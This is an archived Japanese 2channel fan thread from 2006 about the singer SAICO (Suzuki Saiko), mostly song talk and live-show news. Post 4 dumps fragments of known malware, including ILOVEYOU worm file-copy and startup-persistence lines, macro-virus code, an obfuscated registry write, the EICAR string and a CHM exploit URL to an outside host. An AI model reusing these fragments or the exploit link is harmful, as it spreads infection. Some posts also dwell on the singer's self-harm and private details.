5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【僕らの教祖】鈴木彩子の噂 PART 3【僕らの神】

1 :名無しの歌姫:2006/09/05(火) 04:14:36 ID:XDxIm6g8
2000年代も何とかがんばっているSAICO 鈴木彩子を応援しよう

公式(1500円のお布施で掲示板の閲覧が可能)
ttp://www.momineko.gr.jp/saicotop.html

wiki
ttp://ja.wikipedia.org/wiki/SAICO

前スレ
Saico★★鈴木彩子★★サイコ★★復活!★★vol.1
http://music5.2ch.net/test/read.cgi/musicjf/1121700579/l100


2 :名無しの歌姫:2006/09/05(火) 04:15:18 ID:XDxIm6g8
■彩子の近況■
*「葛藤」の歌詞が、21年前〜→34年前のこんな朝〜 に変わってる。
*ライブ→20-50人程度で親密に感じられる。
*BBSで本人が突然、好きなバンドのライブの告知をして、会える場合がある。
(マジです。)
*出待ち・入り待ちで、比較的容易にコミュニケーションできる。

■禁止ルール■
X交際関係→鳥肌の話はデマ。彩子本人が否定
X住所・勤務先ネタ→過去ログで本人が公表してるけど、そっとしておくべき
X公式BBSの常連ファンネタ→過激な信者さんなので、スルー
X作風変わりすぎ→若者の代弁者よりも、Radioheadファン
X政治関係→政治にはナイーブなので、タブー。
彩子を煽ると曲がかけなくなったり、体調を崩して入院するため。
歌手なのに、以前なぜか公式に議論掲示板が出来た。(その後消滅)


3 :名無しの歌姫:2006/09/05(火) 04:23:59 ID:XDxIm6g8
■禁止ルール2■
X自殺・妄想を彩子本人メールするのはイクナイ
→本当にしつこく送った奴がいて、真に受けて彩子がライブで独白
観客がドン引きして嫌な感じになった。
 
*尚、彩子本人が言っている通り、自傷癖があるので、あまりにバッシングすると、
歌手活動中止・入院・数年間お篭りになる可能性があるので注意。
 
*物を送るのはやめよう。
→ファンが「新しい教科書をつくる会」関係の本を大量に送った事があり、
鈴木彩子の日記が大東亜戦争の評価や日本軍の記述で埋まった事があった。
鈴木彩子は容易に洗脳されやすく、流されやすいので気をつけよう。

4 :名無しの歌姫:2006/09/05(火) 07:14:17 ID:Q53XtEw2
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

5 :名無しの歌姫:2006/09/05(火) 14:56:36 ID:IdE3RgOp
なぜ韓国人男性は日本人女性にモテるのか  2006/09/05 08:40
http://japanese.chosun.com/site/data/img_dir/2006/09/05/200609050000111insert_1.jpg
「日本人女性の財布の中身はソウルにつぎ込まれている!」

米国のシカゴ・トリビューン紙がアジアの韓流ブーム現象を特集し、注目を浴びている。
同紙インターネット版は4日(韓国時間)、「日本の女性たちはソウルの男性とお付き合いする
ために血眼になっている」という見出しの記事を掲載した。これは韓流ブームについての記事だ。

 天井知らずの人気を誇る韓流スターたちの出演料も詳しく紹介している。
同紙は「韓国の人気男優たちはハリウッドを除けば最高の待遇で迎えられる俳優になった。
ドラマ『冬のソナタ』のペ・ヨンジュンは現在、映画1本当たり500万ドル(約5億8300万円)の
ギャラが設定されている。また、彼は各種事業を展開し、その資産は1億ドル(約116億円)近い。
その他、チャン・ドンゴンやリュ・シウォンなどの韓流スター9人も年間1000万ドル
(約11億6000万円)以上を稼ぎ出している」と報じた。そして「こうした韓流ブームのおかげで、
韓国の観光産業は右肩上がりで、韓流スター関連グッズも飛ぶように売れている」と付け
加えた。特に、この現象は日本だけでなく中国や、ベトナムなど東南アジアにも広がっている、
と分析している。

 また、「韓国の男性は“アジアのイタリア人”と呼ばれている」とも報じている。
「健康な体と2年間の徴兵義務で、韓国の若い男性はアジアで最も心身共に
よく鍛えられていると言われ、こうしたあだ名がついた」という。

 同紙は、「そのため韓国の男性は日本で一番憧れの男性像になった」と強調する。
お見合いのためにこれまでに韓国を10回も訪れたという日本人女性ヨシムラさんとの
インタビューも掲載された。彼女は「韓国の男性は甘くてロマンチック。
“愛している”の一言も口にできない日本人男性とは違う」として、
理想の韓国人男性探しを続けるという夢を語ったという。

 ついに韓流ブームは、全世界が注目する文化現象として定着したようだ。

キム・ソンウォン記者 『スポーツ朝鮮』
http://japanese.chosun.com/site/data/html_dir/2006/09/05/20060905000011.html

6 :名無しの歌姫:2006/09/07(木) 21:34:55 ID:qpjRY4Qa
>>1

ライヴ前の入院とか電車苦手とかひょっとしてと思ってた
サボもメンヘラだったんだ、何か変な親近感感じた



7 :名無しの歌姫:2006/09/08(金) 18:07:24 ID:hi9q5RrU



8 :名無しの歌姫:2006/09/09(土) 16:15:07 ID:uUVGSW23
メンヘラって何ですか?

9 :名無しの歌姫:2006/09/11(月) 22:55:25 ID:5e1d2JWh
>>8

=メンタルヘルス
http://ja.wikipedia.org/wiki/%E3%83%A1%E3%83%B3%E3%82%BF%E3%83%AB%E3%83%98%E3%83%AB%E3%82%B9

一般的(特に2ちゃん内)に鬱、躁鬱、リスカ、OD、ボーダー、摂食障害等の診断を
受けている人の事を指すらしい・・・

てか、自分もそうやったけど

10 :名無しの歌姫:2006/09/13(水) 00:57:12 ID:Ll2jvxRi
ダイアリー更新されたね。

11 :名無しの歌姫:2006/09/13(水) 01:10:59 ID:5INeyTSc
やばっ、スルーするとこだった^^;

って訳で狂練をみんなで流行らせよう
後、134340番も流行らせよう

12 :名無しの歌姫:2006/09/15(金) 11:46:19 ID:3QZwaJu4
きょうれんはいけるんじゃない?普通に使いそうだしね

13 :名無しの歌姫:2006/09/16(土) 18:10:20 ID:WKIfZNJr
彩子、可愛いよ、彩子‥

狂練とか普通に言い出すなんて萌え杉〜(*´Д`)=з

14 :名無しの歌姫:2006/09/22(金) 11:19:08 ID:qXIo4+2H
コッチカ!キョウレン(*^^*)

15 :名無しの歌姫:2006/09/22(金) 20:06:35 ID:p9mR45cY
新スレ記念age

16 :名無しの歌姫:2006/09/22(金) 22:39:06 ID:M4V1wu/i
なんせ前スレが、何となくだらしない形で終わってしまったからね(´・∀・)

17 :名無しの歌姫:2006/09/23(土) 10:25:52 ID:qUl7br0/
sageると前スレからの迷子達がここを見つけれないお

前スレは彩子オタの実体を垣間見た気がしたな

昨晩初めて24の誓いを聴いた

18 :名無しの歌姫:2006/09/23(土) 13:37:33 ID:8GeJpop5
>>17
感想キボンヌンヌ

19 :名無しの歌姫:2006/09/23(土) 19:36:58 ID:xdnzQeXK
>>18
漏れの求めるサボの曲でない事は分かった

とりあえずブックレットのサボには萌えた

20 :名無しの歌姫:2006/09/23(土) 21:49:49 ID:l4DmKv9J
萌えとか何?

21 :名無しの歌姫:2006/09/23(土) 22:16:48 ID:xdnzQeXK
フツーに可愛くてカッコよかったなと
別にスルーして良し

24の〜はカッコいいけど柔らか過ぎてピンとこなかった

22 :名無しの歌姫:2006/09/23(土) 23:19:10 ID:l4DmKv9J
いいうただよ全部

23 :名無しの歌姫:2006/09/24(日) 00:23:35 ID:f+Ur49MI
いいうただよ、勿論

多分、又聴いてて突然、涙流すんだろうなって


24 :名無しの歌姫:2006/09/24(日) 02:47:21 ID:Dpm4Erab
一応コピペ
本人出てきても大騒ぎにならなかったけどorz

http://off3.2ch.net/test/read.cgi/offevent/1110666624/
★鈴木彩子 サイコOFF IN 東急ハンズ★

1 :名無しさん :05/03/13 07:30:24 ID:iVwgdXBH0
盗んだバイクで疾走し、水たまりに飛び込み泥まみれになる。
青すぎた俺らには彩子がまぶしく見えた。
尾崎も裸足で逃げ出すヒーロー・鈴木彩子!!
そんな彩子のOFF会だ!!
なんと本人が公式BBSで告知だ。

http://ucgi.momineko.gr.jp/cgi-bin/saiko/bbs.cgi
<↓こっから彩子本人が日記で告知したこと>
>>Taeの出演が21時ということで、
>>20:50分ころに行こうと思ってます。
>>もし行けるかたは3/25日20時45分に渋谷東急ハンズの
>>正面口出たところに来てください。階段になってるとこ。
ライブハウスは向かい側です。
(バイク屋の脇の階段下る

25 :名無しの歌姫:2006/09/24(日) 05:54:41 ID:f+Ur49MI
彩子って良心的やね
この頃は名前位しか聞いたことなかった
当日、どんな事したのだろう

>>水たまりに飛び込み泥まみれになる。
青すぎた俺らには彩子がまぶしく見えた。
↑ワロタww

26 :名無しの歌姫:2006/09/24(日) 11:05:57 ID:fBEDZd3E
>>24
だって俺は愛知だし><ライブは東京まで行ったがオフは会話とかついていけないってw

27 :名無しの歌姫:2006/09/24(日) 11:37:13 ID:f+Ur49MI
そんなにコアな内容なの?

28 :名無しの歌姫:2006/09/24(日) 20:20:45 ID:nqjp5aoF
今ウィキ見たんだけど何気に、本名非公開。旧芸名「鈴木彩子」とか変わってたけど彩子って本名じゃなかったの?
誰か詳細キボンヌ

29 :名無しの歌姫:2006/09/24(日) 23:31:18 ID:fBEDZd3E
>>27
イヤ、コアとかじゃなく、次元が違うっしょ?サボの好きなアーティストの音楽知らないし。
そりゃ会話したいけど緊張して死ぬよ。

30 :名無しの歌姫:2006/09/24(日) 23:49:19 ID:s5zfwrFC
>>28
鈴木彩子は本名だろうけど、鈴木は離婚した親父の姓で、今は母方の姓を名乗ってるから??

31 :名無しの歌姫:2006/09/25(月) 00:21:58 ID:5J3OTs/I
だからSAICOになったんかな?

32 :名無しの歌姫:2006/09/25(月) 03:51:10 ID:m9g2qvFV
>>29
好きなアーティストの話ってRADIO HEADの事?

33 :名無しの歌姫:2006/09/25(月) 12:51:53 ID:kWGG4G+M
>>32
そう。レンタルして聴いたがよくわからんかったorz

34 :名無しの歌姫:2006/09/25(月) 14:23:57 ID:bMIw40pf
>>30
そうそう、実生活では「鈴木」じゃなくて、鈴木姓に苦痛を感じているらしい。
(日記より)

35 :名無しの歌姫:2006/09/25(月) 15:28:30 ID:kWGG4G+M
へー。知らなかった。

36 :名無しの歌姫:2006/09/25(月) 23:28:59 ID:m9g2qvFV
>>32
RADIO HEADカッコいいやん、1'stの頃から聴いてるけど
トムヨークのvo.好きやわ

>>34
そうなの、しらなかった・・


37 :30:2006/09/26(火) 00:02:55 ID:5iEiE0VA
スレのルールから言って、書いていいかどうか躊躇するけど、日記とかでも触れられてたから、
たぶん改名の動機だったじゃないかな。
鈴木彩子→サイコ→saicoって変わったみたい。

38 :名無しの歌姫:2006/09/26(火) 00:37:09 ID:XcRZfIfe
初めてDAIPRO以降のアルバム聴いた

カッコよすぎて涙でてきた


39 :名無しの歌姫:2006/09/26(火) 15:08:38 ID:P6P+0wfz
ココのページだけ、高危険度ウイルス警告が出る。
初めて来たけど、危険な為もう来ない。


40 :名無しの歌姫:2006/09/26(火) 15:29:46 ID:mADbSYAu
>>34
ソースは?

41 :名無しの歌姫:2006/09/27(水) 22:18:30 ID:LlvKseHj
WORLD、カッコいい!アレンジのよさもあるけど詩のポジティヴさがいい
後奏のテナーコーラスで鳥肌たった

42 :名無しの歌姫:2006/09/27(水) 22:20:24 ID:auOWuye3
でも〒の口座名義は“鈴木彩子”なんだよね

43 :名無しの歌姫:2006/09/29(金) 22:03:26 ID:od382F7l
>>42

あれびっくりした
なんかサボに貢いでる気持ちになりそう

明日、振り込んでくるおー
サボのためだったらお金なんか惜しくないおー

44 :名無しの歌姫:2006/09/29(金) 22:14:52 ID:BJdNV7bl
>>43
そういう使う道もありかw

45 :名無しの歌姫:2006/10/04(水) 15:25:05 ID:zvoj34MA
次のアルバムまだぁ〜?

46 :名無しの歌姫:2006/10/04(水) 22:32:34 ID:8VRs83y1
LIVEアルバムとかもう出さないのかな

47 :名無しの歌姫:2006/10/04(水) 22:43:02 ID:nKl5DpOY
サイコかわいいね

48 :名無しの歌姫:2006/10/04(水) 23:17:06 ID:a4v00Lvn
サイコ超美人。

49 :名無しの歌姫:2006/10/04(水) 23:40:22 ID:8VRs83y1
彩子愛してるぅー!!

50 :名無しの歌姫:2006/10/05(木) 14:24:04 ID:QUYL7b+w
大塚愛の甘えんぼって歌はサイコさんの歌のパクリなんですか?

51 :名無しの歌姫:2006/10/05(木) 21:04:06 ID:t84j2Z8K
>>50
大塚愛とかよく知らねえけどサボの方が綺麗なのは事実

52 :名無しの歌姫:2006/10/06(金) 01:12:39 ID:UDBxShgW
あの歌ってパクリだったんだ

53 :名無しの歌姫:2006/10/06(金) 18:26:26 ID:YeONKCCz
>>50
これか。

●盗作疑惑(こぴってぺー)
大ブレイク中の大塚愛。そんな彼女の新曲に盗作疑惑が浮上した。
激似のその曲は、鈴木彩子という歌手の「君がくれた風」
(けがれなき大人への道収録)
メロディや歌詞もそのまんま。まさに盗作疑惑といってよい。


54 :名無しの歌姫:2006/10/06(金) 19:30:34 ID:SPqi7sGN
甘えん坊を聴きたいな。

55 :名無しの歌姫:2006/10/06(金) 20:23:59 ID:SPqi7sGN
華原朋美のシングル『あきらめましょう』のカップリングもサイコのパクり?

56 :名無しの歌姫:2006/10/06(金) 21:44:00 ID:3D7695s4
Thank you for my darling...



そんなことより、LIVE情報キタ━━━(゚ё゚)━━!!

57 :名無しの歌姫:2006/10/06(金) 22:17:31 ID:SPqi7sGN
諦めちゃ駄目だよ うつ向いて 喧嘩してたのね

ライブ情報書いてねー!!━━(゚凵゚)━━!!

携帯からムリポどす?

58 :名無しの歌姫:2006/10/06(金) 23:38:06 ID:H/yRR0ih
サボ、あせらなくていいんだよ
呼吸する様にゆっくり一つづつやっていっていいからね

漏れたちはいつまでも待ってるからね


59 :名無しの歌姫:2006/10/07(土) 00:20:53 ID:NBNbwm/d
>>58
あなたは女性ですよね?正直に答えて下さい。


60 :名無しの歌姫:2006/10/07(土) 00:58:47 ID:gKcuUYTQ
>>59
自分は♂でつがそれがなにか?

それよりCereal初めて聴いたけど、無茶苦茶カッコいい!!

久し振りにCD聴いて鳥肌たった


61 :名無しの歌姫:2006/10/07(土) 01:40:45 ID:gKcuUYTQ
>>56

kwsk

62 :名無しの歌姫:2006/10/07(土) 04:56:38 ID:3KRb+csV
>>57>>61
まずは1500円払え(´・∀・)

63 :名無しの歌姫:2006/10/07(土) 06:17:04 ID:gKcuUYTQ
>>62
払いますた

返事町だす(*^ー゚)b

64 :名無しの歌姫:2006/10/07(土) 07:31:19 ID:NBNbwm/d
>>62
払おうかな。。けどメール来なかったり、サービスあんまり充実してないんでしょ?

65 :名無しの歌姫:2006/10/07(土) 19:47:02 ID:gKcuUYTQ
サボのためだったらお金なんておしくないおー

66 :名無しの歌姫:2006/10/07(土) 23:36:43 ID:gKcuUYTQ
gdgdだったAAAの武道館ライヴのフラワーメイクうpがサボだった件に萌えた

67 :名無しの歌姫:2006/10/08(日) 06:29:30 ID:zWyeUdyF
がんばんべ!(・`ω´・)←このAA、気に入った


68 :名無しの歌姫:2006/10/09(月) 08:12:43 ID:6HB9e7Un
一昨日がThom Yorkeのbirthdayだったとか

69 :名無しの歌姫:2006/10/09(月) 23:11:27 ID:ftA8q6CC
平和島のCMをまた見たいよ

70 :名無しの歌姫:2006/10/09(月) 23:33:51 ID:/4ifkxpE
えるせるもたまひめのCMもよかった

71 :名無しの歌姫:2006/10/09(月) 23:36:55 ID:/4ifkxpE
華原朋美のもパクリなんかな?

72 :名無しの歌姫:2006/10/10(火) 00:59:18 ID:xW3UObYC
>>71
あきらめましょうのカップリングな。
怪しいよな。

73 :名無しの歌姫:2006/10/10(火) 02:41:02 ID:dCS5olc/
このサボ艶っぽい

一瞬、マイクスタンド又に挟んでる様にみえて萌えた

http://imepita.jp/trial/20061010/090210

74 :名無しの歌姫:2006/10/10(火) 11:35:49 ID:xW3UObYC
>>73
年代は?

75 :名無しの歌姫:2006/10/12(木) 12:04:16 ID:B09Ona2M
ケツ毛バーガーのお姉さんカワイソス(´・ω・`)

76 :名無しの歌姫:2006/10/12(木) 14:22:35 ID:arpp9fUJ
>>75谷村がどうかした?

77 :名無しの歌姫:2006/10/12(木) 16:36:08 ID:B09Ona2M
シー!!!

78 :名無しの歌姫:2006/10/12(木) 22:46:27 ID:arpp9fUJ
十代の頃、彩子と谷村、どっちも好きだったボク

79 :名無しの歌姫:2006/10/15(日) 18:32:36 ID:6YTYjDXQ
飼い犬とか、生き物との死に別れで涙流せるって大切な事だよね

漏れはもう涙さえ出ないよ

80 :名無しの歌姫:2006/10/15(日) 23:49:08 ID:gAFoK40B
生き物の死って悲しいもんだね

81 :名無しの歌姫:2006/10/18(水) 19:53:25 ID:eZLVVwvX
お願いです。
YouTubeにサボをうpしろ。




82 :名無しの歌姫:2006/10/18(水) 19:54:40 ID:Jam8aMJp
http://ja.wikipedia.org/wiki/SAICO
知らん間に大幅に更新されてゐる(´・∀・)

富士そば最高。

83 :名無しの歌姫:2006/10/18(水) 22:07:25 ID:y6gSK32a
↑すごい。参考になりました!
書いてくれた人ありがとう。

84 :名無しの歌姫:2006/10/19(木) 03:12:48 ID:nJ57BtBu
 、  ∩
( ゚∀゚)彡 ようつべうp
  ⊂彡   ようつべうp


85 :名無しの歌姫:2006/10/19(木) 17:29:31 ID:uBWBEurl
 、  ∩
( ゚∀゚)彡 ようつべうp
  ⊂彡   ようつべうp

86 :名無しの歌姫:2006/10/20(金) 23:43:47 ID:INc7F2R0
昔のLDとかのライブ映像あるがパソコン無いしうpのやり方しらないorz

87 :名無しの歌姫:2006/10/21(土) 12:01:46 ID:O3s6U9SJ
ダイアリー更新して種w

サボ、オムライス、ご馳走して貰ってよかったね

17歳のサボのままでストップしてる仲谷先生、とても微笑ましかったお



88 :名無しの歌姫:2006/10/22(日) 00:50:56 ID:kXiWVH2R
 、  ∩
( ゚∀゚)彡 ようつべうp
  ⊂彡   ようつべうp

89 :名無しの歌姫:2006/10/22(日) 01:03:45 ID:4hi7sF1z
クレクレ厨とかマジウザい

90 :名無しの歌姫:2006/10/22(日) 22:43:12 ID:kXiWVH2R
、  ∩
( ゚∀゚)彡 >>89 ようつべうp
  ⊂彡   >>89 ようつべうp

91 :名無しの歌姫:2006/10/22(日) 23:21:16 ID:4hi7sF1z
>>90
何故に‥∩`Д´)””
   ノ  ⊂ノ
つーか漏れ的にはこの度のツアーの媒体誰かうp
してくれんかと何気にキボン‥

92 :名無しの歌姫:2006/10/22(日) 23:46:29 ID:kXiWVH2R
でわ>>91もご一緒に

 、  ∩
( ゚∀゚)彡 ようつべうp
  ⊂彡   ようつべうp

93 :名無しの歌姫:2006/10/23(月) 00:42:50 ID:+c4oFoye
>>92

>YOU TUBE に載せたとか載ってたとかの話題にはあまり触れない方が良いですよ。
>肖像権・著作権・著作隣接権など法律上の問題ですから。

>「権利侵害しましたよ♪」「権利侵害してるのみんなに教えるね♪」と同義です。

>YOU TUBEネタはすでに色々「ここで見られます」というトピが
>立っていますが、本来違法サイトですのであまりおおっぴらに
>は書かない方が良いのではと思います。
>今更ですが。。。
>実際某超大手事務所の所属アーティストの映像や画像等は全て
>厳しく管理されてネット上で簡単に見られない様に管理されていますし。

‥上記の様な問題があるためyoutubeのupについては慎重にす可き
我々のサボ自身の肖像権を無視してる様なものですし

ついこないだ別サイトで禿しく叩かれた漏れがいってみる‥∩`Д´)””

94 :名無しの歌姫:2006/10/23(月) 17:20:08 ID:fv9efbUb
ようつべうとかクレクレ厨とか何?サイコさんと関係あるわけ?

95 :名無しの歌姫:2006/10/23(月) 17:25:00 ID:fv9efbUb
ばってん荒川死去

96 :名無しの歌姫:2006/10/23(月) 23:42:57 ID:iqqVU/2I
僕が狂ってるんじゃない
>>94が狂ってるんだ
僕が狂ってるんじゃない
>>94が狂ってるんだ

97 :名無しの歌姫:2006/10/24(火) 01:01:26 ID:8KSKBS3T
久々にこの名前をききました。中学生のころにものすごく感銘を受けたのを覚えてます。
ここまで感受性の強いヒトにはもっと世の中の良い面とか楽しいことをたくさん感じてほしいと思います。

98 :名無しの歌姫:2006/10/24(火) 04:43:33 ID:IWkTMYYK
>世の中の良い面とか

>楽しいこと

って何

よかれと思ってやれば馬鹿にされ、頼れば離れられ
愛すれば裏切られるのが現実、

「虚しい挫折をくぐる 消えてゆく純粋なかたち」
の言葉が身にしみた
savoの存在は自分が生きるための理由




99 :名無しの歌姫:2006/10/25(水) 23:14:35 ID:J+IcIRKB
愛ある人になれ

100 :名無しの歌姫:2006/10/27(金) 00:22:59 ID:N7AveCzD
愛とか希望とか、もうどおだっていいんだよ

101 :名無しの歌姫:2006/10/27(金) 20:24:03 ID:46VRM1Jg
なんやねんこのサイト。ただの落書きやないか

102 :名無しの歌姫:2006/10/28(土) 06:09:42 ID:m08dSH/E
サボに弁当作ってもらっった新人のコ、
テラウラヤマシス(´・ω・`)

103 :名無しの歌姫:2006/10/28(土) 20:39:56 ID:C8SRvp/b
やっぱり彩子は、死んではいなかったんだね(´・∀・)

104 :名無しの歌姫:2006/10/28(土) 22:33:07 ID:m08dSH/E
サボが死んだら漏れも死ぬお(´;ω;`)

105 :名無しの歌姫:2006/10/29(日) 00:22:07 ID:0vkKQihG
サボのライブいきてー







106 :名無しの歌姫:2006/10/29(日) 01:34:34 ID:4VP9jGXd
漏れもイキてえ・・(;´Д`)
ニューアルバムリリースのが先とは思うが

つーか弁当の女の子は何年か後にでもサボの
FANになることを期待しつつ小1時間・・


107 :名無しの歌姫:2006/10/29(日) 11:36:23 ID:Uvh3STDl
たまごかけご飯とか、パセリをむしって食ったりしてたのに、他人のために料理を作ってあげるとはね…

108 :名無しの歌姫:2006/10/29(日) 14:40:38 ID:4VP9jGXd
あの子の姿に何かを感じたんだろおな

つーか卵賭けご飯は素で旨いし
餓鬼の頃食ってあれ位感動した事ある

109 :名無しの歌姫:2006/10/31(火) 20:48:36 ID:UL1QUWI3
みんな、メルマガ速報の話題には触れないのか?

110 :名無しの歌姫:2006/11/01(水) 01:19:33 ID:nH1ez1AU
今、仕事から帰ってきてメール確認した

そおゆー>>109は31日、当然行くよな

ちなみにサボのライヴってやっぱ歌詞とか
覚えてないとまずいのかな

111 :名無しの歌姫:2006/11/01(水) 01:23:44 ID:nH1ez1AU
誰も貼らないので貼っておきます

■2006.12.31(日)■  
〜大晦日なんでライヴやります〜
「 Thank you ! 2006  Special  大晦日 ライヴ 」
江古田マーキー
出演 SAICO/オープニングアクト未定
開場 6:30pm 開演 7:00pm
前売り \3500 当日 \3800 ドリンク代別
前売り発売日11/11(日) マーキー 17:00/ローソンチケット 10:00から
SAICO約80分ステージ、アコースティック
お問い合わせ 江古田マーキー03-3994-2948


112 :名無しの歌姫:2006/11/01(水) 02:38:37 ID:1yijq6AF
その後、「カウントダウンオフ」キボンヌ。

113 :名無しの歌姫:2006/11/01(水) 12:25:24 ID:yvFr7dNF
いいなぁ カウントダウンライブ(*´д`*)

サボと年越し。絶対カウントダウンを唄ってくれ!

114 :名無しの歌姫:2006/11/01(水) 15:39:18 ID:nH1ez1AU
個人的にはシリアル、No.に期待だが
空気的にはカウントダウン、葛藤、ヴォイス
あたりだろうな

オフ、行きたいがサボビギナーでメンヘラの
漏れはパスでスマソ・・



115 :名無しの歌姫:2006/11/01(水) 17:53:04 ID:vwygtzqU
自慢のモノマネ(笑)を披露してくれるだろーか

大晦日だよドラえもんスペシャル(=゚ё゚=)

116 :名無しの歌姫:2006/11/01(水) 18:08:10 ID:nH1ez1AU
>>大晦日だよドラえもんスペシャル(=゚ё゚=)
禿キボンwww

つーか又、直前になって入院→延期てな事にならなきゃいいが

117 :名無しの歌姫:2006/11/02(木) 12:36:07 ID:59HxULzV
サボ!大晦日楽しみにしてるよ!



118 :名無しの歌姫:2006/11/02(木) 22:24:49 ID:tW/N/4Dv
栗だ〜、サボのクリも見た・・・あ、いやいや;;

抽選会、楽しみだぁ
合唱とか苦手だけど楽しいライヴになりそうww



119 :名無しの歌姫:2006/11/03(金) 22:07:49 ID:Uiwi1Gap
ライヴ、MOTHER演ってくれそおな予感・・・


120 :名無しの歌姫:2006/11/06(月) 21:18:47 ID:rT88vDbG
大晦日LIVEも結構だが…

いつかは“年忘れにっぽんの歌”に呼ばれちゃうような、ビッグネームになってくれねーかな(´・∀・)

121 :名無しの歌姫:2006/11/06(月) 21:41:08 ID:J8ErVrjz
いつかは武道館だお(・ω・)

122 :名無しの歌姫:2006/11/07(火) 17:04:57 ID:4o+DrrhX
長澤まさみに似てるんかな?

123 :名無しの歌姫:2006/11/07(火) 18:25:41 ID:T98gOw/d
>>122
サボの勝ち!

124 :名無しの歌姫:2006/11/07(火) 20:15:58 ID:4o+DrrhX
同じ年じゃないから解らんけどね。

125 :名無しの歌姫:2006/11/08(水) 04:06:22 ID:8U7BtssB
サボの美しさの前には万人が楡伏せる




ちなみに長澤まさみってだれか
分からなくて検索してみたが
・・かわいいっと思った


126 :名無しの歌姫:2006/11/08(水) 09:13:21 ID:54oPcHQD
彩子は、誰にも似ていない(´ё`)

127 :名無しの歌姫:2006/11/09(木) 00:14:11 ID:UVuDrkaq
誰かにも似てないかもね

128 :名無しの歌姫:2006/11/09(木) 10:38:08 ID:unexgZpe
そりゃ、ボクの嫁ですから

129 :名無しの歌姫:2006/11/10(金) 03:47:31 ID:zJOjsppd
つまんね

130 :名無しの歌姫:2006/11/10(金) 23:19:53 ID:N/NhtT9m
明日からチケット発売だねぇ

131 :名無しの歌姫:2006/11/11(土) 16:54:26 ID:kIBA9DKg
サボ!今日のライブ行けないけど大晦日はいくからね。

132 :名無しの歌姫:2006/11/11(土) 19:55:38 ID:hDaOaunM
>>131
あΣ(゚◎゚;)忘れとったわ

学園祭だったんだねぇ…

スマソ(´・∀・)

133 :名無しの歌姫:2006/11/13(月) 21:01:07 ID:lqj/15d/
ローソンで大晦日のチケット買って来た!
saico歴長いが実はライブは初めて。今から当日が夢のようだ。

134 :名無しの歌姫:2006/11/14(火) 08:44:10 ID:SO/JlSD0
この自殺ブーム、サボは悲観しすぎないで欲しいな。年越しライブに集中して欲しい。確に悲しい現実だが。
自殺願望の子よ、サボの歌を聞いてくれ。『けがれなき大人への道』を。

135 :名無しの歌姫:2006/11/14(火) 22:38:42 ID:DbNpkPCQ
サボの歌を10代の時聴いて感銘を受けました。
悩んでた時、つらい時サボの歌に救われました。
サボありがとう!


136 :名無しの歌姫:2006/11/15(水) 11:27:45 ID:1pm06JS4
最悪。イベントに出るなキモイ
くだらない鬱の歌なんか聴きたくない人間のほうが多いんだ
こういうのが好きな人にだけ聞かせるべきだろ。迷惑過ぎ。

137 :名無しの歌姫:2006/11/15(水) 14:00:08 ID:7DuYy1cJ
BORO BORO


今になって聴いても、かなり{・∀・}イイよ!

138 :名無しの歌姫:2006/11/15(水) 20:26:35 ID:l7J+eqJG
君は 上手に 生きる代わりに 見えない翼 今は BORO BORO
って歌詞すき。

139 :名無しの歌姫:2006/11/16(木) 03:03:47 ID:isxx3IYk
サイコの歌は大好きです。いつまでもサイコを見守って
いるし応援してます。大晦日楽しみにしてます。いい年を
みんなと一緒に迎えましょう。

140 :名無しの歌姫:2006/11/16(木) 05:43:31 ID:zeZV7BNS
声かけてくれた専門学校生の女の子って多分、サボの事知らない子だよね
MOTHERはネ申曲

141 :名無しの歌姫:2006/11/16(木) 21:22:15 ID:0CIg9upP
この世界に生きるすべての者に愛を!

142 :名無しの歌姫:2006/11/18(土) 20:39:23 ID:YW+vUzU3
>136
イベントライブでMOTHER意外にも大好評でしたよ。

143 :名無しの歌姫:2006/11/19(日) 21:35:39 ID:+bw0hWVT
鈴木彩子=ロックンローラー

のイメージがあるから、語りかける歌い方に違和感を覚えてしまうのは仕方ないが



でもやっぱり、イイモノは[・∀・] イイ!

144 :名無しの歌姫:2006/11/21(火) 20:17:25 ID:XFD1whiG
バーベキュー和佐田、エエこと言うわ〜

145 :名無しの歌姫:2006/11/23(木) 23:02:39 ID:WWs6mjuo
あの…

皆さん忙しかったのかな?(´・∀・)

誰も来ないから不安になってきた(゚Д゚;)

146 :名無しの歌姫:2006/11/24(金) 00:25:16 ID:JGlUiS0J
爆裂でサボが「アソコってどこのこと?」と言ってるのを聞いて興奮した記憶アリ ビンビン

147 :名無しの歌姫:2006/11/24(金) 15:50:04 ID:RBygajgM
(´・∀・`)やぁ。カラオケでサボの道を唄うと気持ちよかぁ〜。

148 :名無しの歌姫:2006/11/24(金) 18:55:40 ID:n0LYAb/o
カラオケにVOICEが入ってるかなと行くたびに調べる俺ガイル
あの曲は名曲過ぎる

149 :名無しの歌姫:2006/11/24(金) 22:21:12 ID:hM0yeh8V
夢を追い続けた
あの頃に帰りたい〜

